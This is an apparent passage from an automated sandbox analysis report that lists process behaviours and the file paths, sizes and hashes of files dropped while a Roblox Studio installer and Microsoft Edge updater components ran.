9IjAiIGluc3RhbGxfdGltZV9tcz0iMzc0Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Checks system information in the registry
                                                                                                                          PID:3284

                                                                                                                      Network

                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                      Replay Monitor

                                                                                                                      Loading Replay Monitor...

                                                                                                                      Downloads

                                                                                                                      • C:\Program Files (x86)\Microsoft\EdgeCore\123.0.2420.65\Installer\setup.exe

                                                                                                                        Filesize

                                                                                                                        6.8MB

                                                                                                                        MD5

                                                                                                                        fba106e91d23b64b0ac0f61426f57c51

                                                                                                                        SHA1

                                                                                                                        3f062c1dcaa7bc48fac217a5c3a9b7de254263d2

                                                                                                                        SHA256

                                                                                                                        f8d42e7cbc02e6e1969a25d7f75f45d1c676ee3799ef2a2604025bf9e712b0a0

                                                                                                                        SHA512

                                                                                                                        c9d4505456b7f2aa5c11cdd784b88f2eb8ec53d1369eab4dbaa691a4e86fa98746997bdd2eb782ac9214873771ac6097bb693009c584584cd89d52ea0e9e1c6d

                                                                                                                      • C:\Program Files (x86)\Microsoft\EdgeUpdate\Download\{1FAB8CFE-9860-415C-A6CA-AA7D12021940}\2.0.0.32\BGAUpdate.exe

                                                                                                                        Filesize

                                                                                                                        17.2MB

                                                                                                                        MD5

                                                                                                                        13eff92ece4abda4c76236b1668a9d0c

                                                                                                                        SHA1

                                                                                                                        1e908ed6cf873c77790c7ee03ce1673bf2850b92

                                                                                                                        SHA256

                                                                                                                        7c5c9afa4f6a6ee3a854b915a3486c148d8566411e4362baf049b444bc3e4f5c

                                                                                                                        SHA512

                                                                                                                        b875d9768be15ec6f33744339d0ff26e88d0b9a54b4486c5f0957035ff833828a3c509ade063cd18332ff4efc3c936aa38e314d67579d78bf9610b4c21c5a5f6

                                                                                                                      • C:\Program Files (x86)\Microsoft\EdgeUpdate\Download\{F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}\123.0.2420.65\MicrosoftEdge_X64_123.0.2420.65.exe

                                                                                                                        Filesize

                                                                                                                        164.1MB

                                                                                                                        MD5

                                                                                                                        4b37da5877ccab62032498a24d3863ca

                                                                                                                        SHA1

                                                                                                                        29180050a88947eaa76bc28126c2192264d006cd

                                                                                                                        SHA256

                                                                                                                        bcbe8e2ea625adaf3f7a55222908b532abd8760c35fb509f9c152a032808d13f

                                                                                                                        SHA512

                                                                                                                        8480bfbccc189c4328de8ac4a8fe9b2bac8eed6318b145fa91e5a338342fafe29b97b36c097d018821dbfbb59b5e3bd6da2e1e066fc7c9dad32c625056bf9202

                                                                                                                      • C:\Program Files (x86)\Microsoft\EdgeUpdate\Download\{F3C4FE00-EFD5-403B-9569-398A20F1BA4A}\1.3.185.27\MicrosoftEdgeUpdateSetup_X86_1.3.185.27.exe

                                                                                                                        Filesize

                                                                                                                        1.5MB

                                                                                                                        MD5

                                                                                                                        2412838b3caca23e45c8e9f914ec67b8

                                                                                                                        SHA1

                                                                                                                        c41209bc7f4c71faf2fddf3f022886fc3e78fdfb

                                                                                                                        SHA256

                                                                                                                        48c1a3d1f9d843b902ffc8d6b64df566ccb6bfeed84f7d072d19da5d2e9d51ef

                                                                                                                        SHA512

                                                                                                                        665bffe02b8f46551abf081c78f388b5582861f6f8d8986a860958a37942e01a80a73ba2b0d3a9b743c60265d7f2106b4d27700634bb41ea2481e6f58a8fcc30

                                                                                                                      • C:\Program Files (x86)\Microsoft\Temp\EU2AB1.tmp\EdgeUpdate.dat

                                                                                                                        Filesize

                                                                                                                        12KB

                                                                                                                        MD5

                                                                                                                        369bbc37cff290adb8963dc5e518b9b8

                                                                                                                        SHA1

                                                                                                                        de0ef569f7ef55032e4b18d3a03542cc2bbac191

                                                                                                                        SHA256

                                                                                                                        3d7ec761bef1b1af418b909f1c81ce577c769722957713fdafbc8131b0a0c7d3

                                                                                                                        SHA512

                                                                                                                        4f8ec1fd4de8d373a4973513aa95e646dfc5b1069549fafe0d125614116c902bfc04b0e6afd12554cc13ca6c53e1f258a3b14e54ac811f6b06ed50c9ac9890b1

                                                                                                                      • C:\Program Files (x86)\Microsoft\Temp\EU2AB1.tmp\MicrosoftEdgeComRegisterShellARM64.exe

                                                                                                                        Filesize

                                                                                                                        179KB

                                                                                                                        MD5

                                                                                                                        7a160c6016922713345454265807f08d

                                                                                                                        SHA1

                                                                                                                        e36ee184edd449252eb2dfd3016d5b0d2edad3c6

                                                                                                                        SHA256

                                                                                                                        35a14bd84e74dd6d8e2683470243fb1bb9071178d9283b12ebbfb405c8cd4aa9

                                                                                                                        SHA512

                                                                                                                        c0f1d5c8455cf14f2088ede062967d6dfa7c39ca2ac9636b10ed46dfbea143f64106a4f03c285e89dd8cf4405612f1eef25a8ec4f15294ca3350053891fc3d7e

                                                                                                                      • C:\Program Files (x86)\Microsoft\Temp\EU2AB1.tmp\MicrosoftEdgeUpdate.exe

                                                                                                                        Filesize

                                                                                                                        201KB

                                                                                                                        MD5

                                                                                                                        4dc57ab56e37cd05e81f0d8aaafc5179

                                                                                                                        SHA1

                                                                                                                        494a90728d7680f979b0ad87f09b5b58f16d1cd5

                                                                                                                        SHA256

                                                                                                                        87c6f7d9b58f136aeb33c96dbfe3702083ec519aafca39be66778a9c27a68718

                                                                                                                        SHA512

                                                                                                                        320eeed88d7facf8c1f45786951ef81708c82cb89c63a3c820ee631c52ea913e64c4e21f0039c1b277cfb710c4d81cd2191878320d00fd006dd777c727d9dc2b

                                                                                                                      • C:\Program Files (x86)\Microsoft\Temp\EU2AB1.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe

                                                                                                                        Filesize

                                                                                                                        212KB

                                                                                                                        MD5

                                                                                                                        60dba9b06b56e58f5aea1a4149c743d2

                                                                                                                        SHA1

                                                                                                                        a7e456acf64dd99ca30259cf45b88cf2515a69b3

                                                                                                                        SHA256

                                                                                                                        4d01f5531f93ab2af9e92c4f998a145c94f36688c3793845d528c8675697e112

                                                                                                                        SHA512

                                                                                                                        e98088a368d4c4468e325a1d62bee49661f597e5c1cd1fe2dabad3911b8ac07e1cc4909e7324cb4ab39f30fa32a34807685fcfba767f88884ef84ca69a0049e7

                                                                                                                      • C:\Program Files (x86)\Microsoft\Temp\EU2AB1.tmp\MicrosoftEdgeUpdateCore.exe

                                                                                                                        Filesize

                                                                                                                        257KB

                                                                                                                        MD5

                                                                                                                        c044dcfa4d518df8fc9d4a161d49cece

                                                                                                                        SHA1

                                                                                                                        91bd4e933b22c010454fd6d3e3b042ab6e8b2149

                                                                                                                        SHA256

                                                                                                                        9f79fe09f57002ca07ae0b2a196e8cc002d2be6d5540ee857217e99b33fa4bb2

                                                                                                                        SHA512

                                                                                                                        f26b89085aa22ac62a28610689e81b4dfe3c38a9015ec56dfeaff02fdb6fa64e784b86a961509b52ad968400faa1ef0487f29f07a41e37239fe4c3262a11ac2c

                                                                                                                      • C:\Program Files (x86)\Microsoft\Temp\EU2AB1.tmp\NOTICE.TXT

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                        MD5

                                                                                                                        6dd5bf0743f2366a0bdd37e302783bcd

                                                                                                                        SHA1

                                                                                                                        e5ff6e044c40c02b1fc78304804fe1f993fed2e6

                                                                                                                        SHA256

                                                                                                                        91d3fc490565ded7621ff5198960e501b6db857d5dd45af2fe7c3ecd141145f5

                                                                                                                        SHA512

                                                                                                                        f546c1dff8902a3353c0b7c10ca9f69bb77ebd276e4d5217da9e0823a0d8d506a5267773f789343d8c56b41a0ee6a97d4470a44bbd81ceaa8529e5e818f4951e

                                                                                                                      • C:\Program Files (x86)\Microsoft\Temp\EU2AB1.tmp\msedgeupdate.dll

                                                                                                                        Filesize

                                                                                                                        2.0MB

                                                                                                                        MD5

                                                                                                                        965b3af7886e7bf6584488658c050ca2

                                                                                                                        SHA1

                                                                                                                        72daabdde7cd500c483d0eeecb1bd19708f8e4a5

                                                                                                                        SHA256

                                                                                                                        d80c512d99765586e02323a2e18694965eafb903e9bc13f0e0b4265f86b21a19

                                                                                                                        SHA512

                                                                                                                        1c57dc7b89e7f13f21eaec7736b724cd864c443a2f09829308a4f23cb03e9a5f2a1e5bcdc441301e33119767e656a95d0f9ede0e5114bf67f5dce6e55de7b0a4

                                                                                                                      • C:\Program Files (x86)\Microsoft\Temp\EU2AB1.tmp\msedgeupdateres_af.dll

                                                                                                                        Filesize

                                                                                                                        28KB

                                                                                                                        MD5

                                                                                                                        567aec2d42d02675eb515bbd852be7db

                                                                                                                        SHA1

                                                                                                                        66079ae8ac619ff34e3ddb5fb0823b1790ba7b37

                                                                                                                        SHA256

                                                                                                                        a881788359b2a7d90ac70a76c45938fb337c2064487dcb8be00b9c311d10c24c

                                                                                                                        SHA512

                                                                                                                        3a7414e95c2927d5496f29814556d731aef19efa531fb58988079287669dfc033f3e04c8740697571df76bfecfe3b75659511783ce34682d2a2ea704dfa115b3

                                                                                                                      • C:\Program Files (x86)\Microsoft\Temp\EU2AB1.tmp\msedgeupdateres_am.dll

                                                                                                                        Filesize

                                                                                                                        24KB

                                                                                                                        MD5

                                                                                                                        f6c1324070b6c4e2a8f8921652bfbdfa

                                                                                                                        SHA1

                                                                                                                        988e6190f26e4ca8f7ea3caabb366cf1edcdcbbf

                                                                                                                        SHA256

                                                                                                                        986b0654a8b5f7b23478463ff051bffe1e9bbdeb48744e4aa1bd3d89a7520717

                                                                                                                        SHA512

                                                                                                                        63092cf13e8a19966181df695eb021b0a9993afe8f98b1309973ea999fdf4cd9b6ffd609968d4aa0b2cde41e872688a283fd922d8b22cb5ad06339fe18221100

                                                                                                                      • C:\Program Files (x86)\Microsoft\Temp\EU2AB1.tmp\msedgeupdateres_ar.dll

                                                                                                                        Filesize

                                                                                                                        26KB

                                                                                                                        MD5

                                                                                                                        570efe7aa117a1f98c7a682f8112cb6d

                                                                                                                        SHA1

                                                                                                                        536e7c49e24e9aa068a021a8f258e3e4e69fa64f

                                                                                                                        SHA256

                                                                                                                        e2cc8017bc24e73048c7ee68d3787ed63c3898eec61299a9ca1bab8aeaa8da01

                                                                                                                        SHA512

                                                                                                                        5e963dd55a5739a1da19cec7277dc3d07afdb682330998fd8c33a1b5949942019521967d8b5af0752a7a8e2cf536faa7e62982501170319558ceaa21ed657ae8

                                                                                                                      • C:\Program Files (x86)\Microsoft\Temp\EU2AB1.tmp\msedgeupdateres_as.dll

                                                                                                                        Filesize

                                                                                                                        28KB

                                                                                                                        MD5

                                                                                                                        a8d3210e34bf6f63a35590245c16bc1b

                                                                                                                        SHA1

                                                                                                                        f337f2cbec05b7e20ca676d7c2b1a8d5ae8bf693

                                                                                                                        SHA256

                                                                                                                        3b82de846ad028544013383e3c9fb570d2a09abf2c854e8a4d641bd7fc3b3766

                                                                                                                        SHA512

                                                                                                                        6e47ffe8f7c2532e7854dcae3cbd4e6533f0238815cb6af5ea85087c51017ea284542b988f07692d0297ebab1bad80d7613bf424ff532e10b01c8e528ab1043a

                                                                                                                      • C:\Program Files (x86)\Microsoft\Temp\EU2AB1.tmp\msedgeupdateres_az.dll

                                                                                                                        Filesize

                                                                                                                        29KB

                                                                                                                        MD5

                                                                                                                        7937c407ebe21170daf0975779f1aa49

                                                                                                                        SHA1

                                                                                                                        4c2a40e76209abd2492dfaaf65ef24de72291346

                                                                                                                        SHA256

                                                                                                                        5ab96e4e6e065dbce3b643c6be2c668f5570984ead1a8b3578bbd2056fbad4e9

                                                                                                                        SHA512

                                                                                                                        8670746941660e6573732077f5ed1b630f94a825cf4ac9dbe5018772eaac1c48216334757a2aeaa561034b4d907162a370b8f0bae83b34a09457fafe165fb5d7

                                                                                                                      • C:\Program Files (x86)\Microsoft\Temp\EU2AB1.tmp\msedgeupdateres_bg.dll

                                                                                                                        Filesize

                                                                                                                        29KB

                                                                                                                        MD5

                                                                                                                        8375b1b756b2a74a12def575351e6bbd

                                                                                                                        SHA1

                                                                                                                        802ec096425dc1cab723d4cf2fd1a868315d3727

                                                                                                                        SHA256

                                                                                                                        a12df15afac4eb2695626d7a8a2888bdf54c8db671043b0677180f746d8ad105

                                                                                                                        SHA512

                                                                                                                        aec4bb94fde884db79a629abcff27fd8afb7f229d055514f51fa570fb47a85f8dfc9a54a8f69607d2bcaf82fae1ec7ffab0b246795a77a589be11fad51b24d19

                                                                                                                      • C:\Program Files (x86)\Microsoft\Temp\EU2AB1.tmp\msedgeupdateres_bn-IN.dll

                                                                                                                        Filesize

                                                                                                                        29KB

                                                                                                                        MD5

                                                                                                                        a94cf5e8b1708a43393263a33e739edd

                                                                                                                        SHA1

                                                                                                                        1068868bdc271a52aaae6f749028ed3170b09cce

                                                                                                                        SHA256

                                                                                                                        5b01fe11016610d5606f815281c970c86025732fc597b99c031a018626cd9f3c

                                                                                                                        SHA512

                                                                                                                        920f7fed1b720afdb569aec2961bd827a6fc54b4598c0704f65da781d142b1707e5106a459f0c289e0f476b054d93c0b733806af036b68f46377dde0541af2e7

                                                                                                                      • C:\Program Files (x86)\Microsoft\Temp\EU2AB1.tmp\msedgeupdateres_bn.dll

                                                                                                                        Filesize

                                                                                                                        29KB

                                                                                                                        MD5

                                                                                                                        7dc58c4e27eaf84ae9984cff2cc16235

                                                                                                                        SHA1

                                                                                                                        3f53499ddc487658932a8c2bcf562ba32afd3bda

                                                                                                                        SHA256

                                                                                                                        e32f77ed3067d7735d10f80e5a0aa0c50c993b59b82dc834f2583c314e28fa98

                                                                                                                        SHA512

                                                                                                                        bdec1300cf83ea06dfd351fe1252b850fecea08f9ef9cb1207fce40ce30742348db953107ade6cdb0612af2e774345faf03a8a6476f2f26735eb89153b4256dc

                                                                                                                      • C:\Program Files (x86)\Microsoft\Temp\EU2AB1.tmp\msedgeupdateres_bs.dll

                                                                                                                        Filesize

                                                                                                                        28KB

                                                                                                                        MD5

                                                                                                                        e338dccaa43962697db9f67e0265a3fc

                                                                                                                        SHA1

                                                                                                                        4c6c327efc12d21c4299df7b97bf2c45840e0d83

                                                                                                                        SHA256

                                                                                                                        99b1b7e25fbc2c64489c0607cef0ae5ff720ab529e11093ed9860d953adeba04

                                                                                                                        SHA512

                                                                                                                        e0c15b166892433ef31ddf6b086680c55e1a515bed89d51edbdf526fcac71fb4e8cb2fadc739ac75ae5c2d9819fc985ca873b0e9e2a2925f82e0a456210898f9

                                                                                                                      • C:\Program Files (x86)\Microsoft\Temp\EU2AB1.tmp\msedgeupdateres_ca-Es-VALENCIA.dll

                                                                                                                        Filesize

                                                                                                                        29KB

                                                                                                                        MD5

                                                                                                                        2929e8d496d95739f207b9f59b13f925

                                                                                                                        SHA1

                                                                                                                        7c1c574194d9e31ca91e2a21a5c671e5e95c734c

                                                                                                                        SHA256

                                                                                                                        2726c48a468f8f6debc2d9a6a0706b640b2852c885e603e6b2dec638756160df

                                                                                                                        SHA512

                                                                                                                        ea459305d3c3fa7a546194f649722b76072f31e75d59da149c57ff05f4af8f38a809066054df809303937bbca917e67441da2f0e1ea37b50007c25ae99429957

                                                                                                                      • C:\Program Files (x86)\Microsoft\Temp\EU2AB1.tmp\msedgeupdateres_ca.dll

                                                                                                                        Filesize

                                                                                                                        30KB

                                                                                                                        MD5

                                                                                                                        39551d8d284c108a17dc5f74a7084bb5

                                                                                                                        SHA1

                                                                                                                        6e43fc5cec4b4b0d44f3b45253c5e0b032e8e884

                                                                                                                        SHA256

                                                                                                                        8dbd55ed532073874f4fe006ef456e31642317145bd18ddc30f681ce9e0c8e07

                                                                                                                        SHA512

                                                                                                                        6fa5013a9ce62deca9fa90a98849401b6e164bbad8bef00a8a8b228427520dd584e28cba19c71e2c658692390fe29be28f0398cb6c0f9324c56290bb245d06d2

                                                                                                                      • C:\Program Files (x86)\Microsoft\Temp\EU2AB1.tmp\msedgeupdateres_cs.dll

                                                                                                                        Filesize

                                                                                                                        28KB

                                                                                                                        MD5

                                                                                                                        16c84ad1222284f40968a851f541d6bb

                                                                                                                        SHA1

                                                                                                                        bc26d50e15ccaed6a5fbe801943117269b3b8e6b

                                                                                                                        SHA256

                                                                                                                        e0f0026ddcbeafc6c991da6ba7c52927d050f928dba4a7153552efcea893a35b

                                                                                                                        SHA512

                                                                                                                        d3018619469ed25d84713bd6b6515c9a27528810765ed41741ac92caf0a3f72345c465a5bda825041df69e1264aada322b62e10c7ed20b3d1bcde82c7e146b7e

                                                                                                                      • C:\Program Files (x86)\Microsoft\Temp\EU2AB1.tmp\msedgeupdateres_cy.dll

                                                                                                                        Filesize

                                                                                                                        28KB

                                                                                                                        MD5

                                                                                                                        34d991980016595b803d212dc356d765

                                                                                                                        SHA1

                                                                                                                        e3a35df6488c3463c2a7adf89029e1dd8308f816

                                                                                                                        SHA256

                                                                                                                        252b6f9bf5a9cb59ad1c072e289cc9695c0040b363d4bfbcc9618a12df77d18e

                                                                                                                        SHA512

                                                                                                                        8a6cbcf812af37e3ead789fbec6cba9c4e1829dbeea6200f0abbdae15efd1eda38c3a2576e819d95ed2df0aafd2370480daa24a3fe6aeb8081a936d5e1f8d8ed

                                                                                                                      • C:\Program Files (x86)\Microsoft\Temp\EU2AB1.tmp\msedgeupdateres_da.dll

                                                                                                                        Filesize

                                                                                                                        28KB

                                                                                                                        MD5

                                                                                                                        d34380d302b16eab40d5b63cfb4ed0fe

                                                                                                                        SHA1

                                                                                                                        1d3047119e353a55dc215666f2b7b69f0ede775b

                                                                                                                        SHA256

                                                                                                                        fd98159338d1f3b03814af31440d37d15ab183c1a230e6261fbb90e402f85d5f

                                                                                                                        SHA512

                                                                                                                        45ce58f4343755e392037a9c6fc301ad9392e280a72b9d4b6d328866fe26877b2988c39e05c4e7f1d5b046c0864714b897d35285e222fd668f0d71b7b10e6538

                                                                                                                      • C:\Program Files (x86)\Microsoft\Temp\EU2AB1.tmp\msedgeupdateres_de.dll

                                                                                                                        Filesize

                                                                                                                        30KB

                                                                                                                        MD5

                                                                                                                        aab01f0d7bdc51b190f27ce58701c1da

                                                                                                                        SHA1

                                                                                                                        1a21aabab0875651efd974100a81cda52c462997

                                                                                                                        SHA256

                                                                                                                        061a7cdaff9867ddb0bd3de2c0760d6919d8d2ca7c7f889ec2d32265d7e7a75c

                                                                                                                        SHA512

                                                                                                                        5edbda45205b61ac48ea6e874411bb1031989001539650de6e424528f72ec8071bd709c037c956450bb0558ee37d026c26fdb966efceb990ed1219f135b09e6e

                                                                                                                      • C:\Program Files (x86)\Microsoft\Temp\EU2AB1.tmp\msedgeupdateres_el.dll

                                                                                                                        Filesize

                                                                                                                        30KB

                                                                                                                        MD5

                                                                                                                        ac275b6e825c3bd87d96b52eac36c0f6

                                                                                                                        SHA1

                                                                                                                        29e537d81f5d997285b62cd2efea088c3284d18f

                                                                                                                        SHA256

                                                                                                                        223d2db0bc2cc82bda04a0a2cd2b7f6cb589e2fa5c0471a2d5eb04d2ffcfcfa0

                                                                                                                        SHA512

                                                                                                                        bba581412c4297c4daf245550a2656cdc2923f77158b171e0eacf6e933c174eac84580864813cf6d75d73d1a58e0caf46170aee3cee9d84dc468379252b16679

                                                                                                                      • C:\Program Files (x86)\Microsoft\Temp\EU2AB1.tmp\msedgeupdateres_en-GB.dll

                                                                                                                        Filesize

                                                                                                                        27KB

                                                                                                                        MD5

                                                                                                                        d749e093f263244d276b6ffcf4ef4b42

                                                                                                                        SHA1

                                                                                                                        69f024c769632cdbb019943552bac5281d4cbe05

                                                                                                                        SHA256

                                                                                                                        fd90699e7f29b6028a2e8e6f3ae82d26cdc6942bd39c4f07b221d87c5dbbfe1e

                                                                                                                        SHA512

                                                                                                                        48d51b006ce0cd903154fa03d17e76591db739c4bfb64243725d21d4aa17db57a852077be00b9a51815d09664d18f9e6ad61d9bc41b3d013ed24aaec8f477ad9

                                                                                                                      • C:\Program Files (x86)\Microsoft\Temp\EU2AB1.tmp\msedgeupdateres_en.dll

                                                                                                                        Filesize

                                                                                                                        27KB

                                                                                                                        MD5

                                                                                                                        4a1e3cf488e998ef4d22ac25ccc520a5

                                                                                                                        SHA1

                                                                                                                        dc568a6e3c9465474ef0d761581c733b3371b1cd

                                                                                                                        SHA256

                                                                                                                        9afbbe2a591250b80499f0bf02715f02dbcd5a80088e129b1f670f1a3167a011

                                                                                                                        SHA512

                                                                                                                        ce3bffb6568ff2ef83ef7c89fd668f6b5972f1484ce3fbd5597dcac0eaec851d5705ed17a5280dd08cd9812d6faec58a5561217b897c9209566545db2f3e1245

                                                                                                                      • C:\Program Files (x86)\Microsoft\Temp\EU2AB1.tmp\msedgeupdateres_es-419.dll

                                                                                                                        Filesize

                                                                                                                        29KB

                                                                                                                        MD5

                                                                                                                        28fefc59008ef0325682a0611f8dba70

                                                                                                                        SHA1

                                                                                                                        f528803c731c11d8d92c5660cb4125c26bb75265

                                                                                                                        SHA256

                                                                                                                        55a69ce2d6fc4109d16172ba6d9edb59dbadbc8af6746cc71dc4045aa549022d

                                                                                                                        SHA512

                                                                                                                        2ec71244303beac7d5ce0905001fe5b0fb996ad1d1c35e63eecd4d9b87751f0633a281554b3f0aa02ee44b8ceaad85a671ef6c34589055797912324e48cc23ed

                                                                                                                      • C:\Program Files (x86)\Microsoft\Temp\EU2AB1.tmp\msedgeupdateres_es.dll

                                                                                                                        Filesize

                                                                                                                        28KB

                                                                                                                        MD5

                                                                                                                        9db7f66f9dc417ebba021bc45af5d34b

                                                                                                                        SHA1

                                                                                                                        6815318b05019f521d65f6046cf340ad88e40971

                                                                                                                        SHA256

                                                                                                                        e652159a75cbab76217ecbb4340020f277175838b316b32cf71e18d83da4a819

                                                                                                                        SHA512

                                                                                                                        943d8fc0d308c5ccd5ab068fc10e799b92465a22841ce700c636e7ae1c12995d99c0a93ab85c1ae27fefce869eabadbeafee0f2f5f010ad3b35fa4f748b54952

                                                                                                                      • C:\Program Files (x86)\Roblox\Versions\RobloxStudioInstaller.exe

                                                                                                                        Filesize

                                                                                                                        4.6MB

                                                                                                                        MD5

                                                                                                                        a6b477fd2a8f8a2f773524399dbcfefe

                                                                                                                        SHA1

                                                                                                                        7d80eb58dfd74d2d6b808663044e4ad35085f99b

                                                                                                                        SHA256

                                                                                                                        7de163bfcdac41638190fc00a32f1937c38c35a18aae4e0945adc28ebd223ac3

                                                                                                                        SHA512

                                                                                                                        f8c96581475df161bf53261492abe09504d3e4c7206874c7d8d90bc76305f02f06005fec35cffaec517de0bb36b62e62a85e22607fe669c2c3bdf008c56bb957

                                                                                                                      • C:\Program Files (x86)\Roblox\Versions\version-f573c8cc796e4c97\WebView2RuntimeInstaller\MicrosoftEdgeWebview2Setup.exe

                                                                                                                        Filesize

                                                                                                                        1.5MB

                                                                                                                        MD5

                                                                                                                        610b1b60dc8729bad759c92f82ee2804

                                                                                                                        SHA1

                                                                                                                        9992b7ae7a9c4e17a0a6d58ffd91b14cbb576552

                                                                                                                        SHA256

                                                                                                                        921d51979f3416ca19dca13a057f6fd3b09d8741f3576cad444eb95af87ebe08

                                                                                                                        SHA512

                                                                                                                        0614c4e421ccd5f4475a690ba46aac5bbb7d15caea66e2961895724e07e1ec7ee09589ca9394f6b2bcfb2160b17ac53798d3cf40fb207b6e4c6381c8f81ab6b4

                                                                                                                      • C:\Program Files\MsEdgeCrashpad\settings.dat

                                                                                                                        Filesize

                                                                                                                        280B

                                                                                                                        MD5

                                                                                                                        059999635639afedca5ff94ba7baa128

                                                                                                                        SHA1

                                                                                                                        97b22e0c93e830a6604894a7c8dec2ee4cb53332

                                                                                                                        SHA256

                                                                                                                        2780d382944d5243177ece5758e3c221e286875ac80fe91a954f1ebe57d8dc33

                                                                                                                        SHA512

                                                                                                                        dd28c00a994d32e8d918a0cd25ff3e169417044625fa55b29886b9b6777c08dbe4edaca3eac272b6a39386b9bc95800d592a9994173a2a4d50ccdf586c8c7cc8

                                                                                                                      • C:\ProgramData\Microsoft\EdgeUpdate\Log\MicrosoftEdgeUpdate.log

                                                                                                                        Filesize

                                                                                                                        120KB

                                                                                                                        MD5

                                                                                                                        db9d14aaf32f99003850194424d12898

                                                                                                                        SHA1

                                                                                                                        85c4e21b34a6c94d33dce6bde57185d54576aaf9

                                                                                                                        SHA256

                                                                                                                        41db9c0a27b019431b4c0551d0463e931a3abdcb8f4966205b677d1f31c5ff68

                                                                                                                        SHA512

                                                                                                                        33e58ac093373878f22e9c28c88a155f4b59938864479377cb4ce918136d82c4c8d53165a72145daf379c8aac195c96b7e0b10a2e8a4e2d09a03ed738c5c1bd4

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                        Filesize

                                                                                                                        152B

                                                                                                                        MD5

                                                                                                                        0764f5481d3c05f5d391a36463484b49

                                                                                                                        SHA1

                                                                                                                        2c96194f04e768ac9d7134bc242808e4d8aeb149

                                                                                                                        SHA256

                                                                                                                        cc773d1928f4a87e10944d153c23a7b20222b6795c9a0a09b81a94c1bd026ac3

                                                                                                                        SHA512

                                                                                                                        a39e4cb7064fdd7393ffe7bb3a5e672b1bdc14d878cac1c5c9ceb97787454c5a4e7f9ae0020c6d524920caf7eadc9d49e10bee8799d73ee4e8febe7e51e22224

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                        Filesize

                                                                                                                        152B

                                                                                                                        MD5

                                                                                                                        e494d16e4b331d7fc483b3ae3b2e0973

                                                                                                                        SHA1

                                                                                                                        d13ca61b6404902b716f7b02f0070dec7f36edbf

                                                                                                                        SHA256

                                                                                                                        a43f82254638f7e05d1fea29e83545642f163a7a852f567fb2e94f0634347165

                                                                                                                        SHA512

                                                                                                                        016b0ed886b33d010c84ca080d74fa343da110db696655c94b71a4cb8eb8284748dd83e06d0891a6e1e859832b0f1d07748b11d4d1a4576bbe1bee359e218737

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

                                                                                                                        Filesize

                                                                                                                        86KB

                                                                                                                        MD5

                                                                                                                        d170269951b86f585f899d21ae50e782

                                                                                                                        SHA1

                                                                                                                        e981cf3277587be2e230a211eeb4a64a77aaaf97

                                                                                                                        SHA256

                                                                                                                        ca08d2665294fd7036d1c5260dc3c7a280961e4097651ddf2cf950925a1f988f

                                                                                                                        SHA512

                                                                                                                        a1769e21b012fb39d9b625ce8d8173d306af510a05c3a377f9d6b7a4894ee53933a191aeda48a7850e7d057ab3d97a49854045f514aa75584da5a5fdaa5d670e

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001a

                                                                                                                        Filesize

                                                                                                                        48KB

                                                                                                                        MD5

                                                                                                                        21af9bc981d404957c6344aaff4b3e28

                                                                                                                        SHA1

                                                                                                                        e5569bc0876884ded0d9594432cc261effc66d47

                                                                                                                        SHA256

                                                                                                                        e9515acb1b0c8f7c1008358ed424d6563cae681f0e87c53547d0cb7b9f51b051

                                                                                                                        SHA512

                                                                                                                        fb42427a114a3cb5739c30f6235c4fe3102876b2063772665c82ecce483955d357dead930e6da185f2b27fb0e72b9837ee272c3271efa5b7e80f98edf4cfaae8

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000fb

                                                                                                                        Filesize

                                                                                                                        51KB

                                                                                                                        MD5

                                                                                                                        588ee33c26fe83cb97ca65e3c66b2e87

                                                                                                                        SHA1

                                                                                                                        842429b803132c3e7827af42fe4dc7a66e736b37

                                                                                                                        SHA256

                                                                                                                        bbc4044fe46acd7ab69d8a4e3db46e7e3ca713b05fa8ecb096ebe9e133bba760

                                                                                                                        SHA512

                                                                                                                        6f7500b12fc7a9f57c00711af2bc8a7c62973f9a8e37012b88a0726d06063add02077420bc280e7163302d5f3a005ac8796aee97042c40954144d84c26adbd04

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00014c

                                                                                                                        Filesize

                                                                                                                        16KB

                                                                                                                        MD5

                                                                                                                        48c80c7c28b5b00a8b4ff94a22b72fe3

                                                                                                                        SHA1

                                                                                                                        d57303c2ad2fd5cedc5cb20f264a6965a7819cee

                                                                                                                        SHA256

                                                                                                                        6e9be773031b3234fb9c2d6cf3d9740db1208f4351beca325ec34f76fd38f356

                                                                                                                        SHA512

                                                                                                                        c7381e462c72900fdbb82b5c365080efa009287273eb5109ef25c8d0a5df33dd07664fd1aed6eb0d132fa6a3cb6a3ff6b784bffeeca9a2313b1e6eb6e32ab658

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00019c

                                                                                                                        Filesize

                                                                                                                        20KB

                                                                                                                        MD5

                                                                                                                        87e8230a9ca3f0c5ccfa56f70276e2f2

                                                                                                                        SHA1

                                                                                                                        eb116c8fd20cb2f85b7a942c7dae3b0ed6d27fe7

                                                                                                                        SHA256

                                                                                                                        e18d7214e7d3d47d913c0436f5308b9296ca3c6cd34059bf9cbf03126bafafe9

                                                                                                                        SHA512

                                                                                                                        37690a81a9e48b157298080746aa94289a4c721c762b826329e70b41ba475bb0261d048f9ab8e7301e43305c5ebf53246c20da8cd001130bf156e8b3bd38b9b8

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index

                                                                                                                        Filesize

                                                                                                                        3KB

                                                                                                                        MD5

                                                                                                                        febf0f86628ffedf0642bb6fa6843b74

                                                                                                                        SHA1

                                                                                                                        d8a9d6d6b6a278effcbf5a92944aaf42938e764f

                                                                                                                        SHA256

                                                                                                                        1aac622cb386fe2ff60e890a9555a801736cdc7cd66fb956e7d7f064d008f8c2

                                                                                                                        SHA512

